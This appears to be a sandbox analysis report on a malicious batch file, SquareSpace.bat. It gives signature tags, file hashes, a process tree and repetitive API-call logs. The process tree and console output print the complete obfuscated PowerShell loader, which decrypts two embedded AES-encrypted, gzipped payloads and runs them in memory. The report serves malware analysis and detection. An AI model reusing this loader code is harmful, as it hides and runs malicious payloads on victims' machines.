Summary | ZeroBOX

SquareSpace.bat

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Feb. 11, 2025, 10:41 a.m. Feb. 11, 2025, 10:51 a.m.
Size 59.4KB
Type DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5 dc38ed57b189d67b26b0dd7622067cf9
SHA256 13288324fe1b9f0f0220b49244d67e56b57569ba1cf84de8a94e20a78c7e0de7
CRC32 3B16643A
ssdeep 1536:F/1UragTjQ6eeAUCCie+5gEODZUK19SB8xu5:LabdU1ODROiE
Yara
  • Antivirus - Contains references to security software

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "NTVqLNzJkq" C:\Users\test22\AppData\Local\Temp\SquareSpace.bat

    2552
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\SquareSpace.bat

      2628
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxdwVCPCgMSsIsCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.MemoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\test22\AppData\Local\Temp\SquareSpace.bat';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsWith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

        2756

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Unexpected token '(' in expression or statement.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: At line:1 char:295
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: + function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: .Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Ke
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: y=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')( <<<< 'SxdwVCPCgMSsI
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: sCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaB
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: morF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.C
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: reateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0,
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: }function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqU
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: nOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgR
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: ipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.M
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: emoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOi
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: RuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQ
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: WBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYq
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: nKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwr
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: kuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOi
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: RuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMx
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: oCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvL
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: RFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXn
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: LzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Asse
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: mbly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmAps
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: lJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXH
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: AsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGEN
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: CycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfF
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: DRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\test22\AppData\Local\Temp\SquareSpace.bat
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: ';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBH
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: RkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxob
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: XveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgm
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: OTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFY
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: MJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsys
console_handle: 0x000001af
1 1 0

WriteConsoleW

buffer: LOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIP
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: GeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBs
console_handle: 0x000001c7
1 1 0

WriteConsoleW

buffer: SMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnb
console_handle: 0x000001d3
1 1 0

WriteConsoleW

buffer: Ih = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXY
console_handle: 0x000001df
1 1 0

WriteConsoleW

buffer: bjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZyc
console_handle: 0x000001eb
1 1 0

WriteConsoleW

buffer: DaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvl
console_handle: 0x000001f7
1 1 0

WriteConsoleW

buffer: CwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoM
console_handle: 0x00000203
1 1 0

WriteConsoleW

buffer: ANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPW
console_handle: 0x0000020f
1 1 0

WriteConsoleW

buffer: tQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsW
console_handle: 0x0000021b
1 1 0

WriteConsoleW

buffer: ith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJ
console_handle: 0x00000227
1 1 0

WriteConsoleW

buffer: KbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break;
console_handle: 0x00000233
1 1 0

WriteConsoleW

buffer: }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzP
console_handle: 0x0000023f
1 1 0

WriteConsoleW

buffer: pTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Conv
console_handle: 0x0000024b
1 1 0

WriteConsoleW

buffer: ert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=
console_handle: 0x00000257
1 1 0

WriteConsoleW

buffer: decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16]
console_handle: 0x00000263
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005449f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544af8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544ef8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544ef8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544ef8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544ef8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544ef8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00544ef8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b80000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2756
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2756
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0215a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0216b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02167000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02152000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02165000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0215c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0216c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02153000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
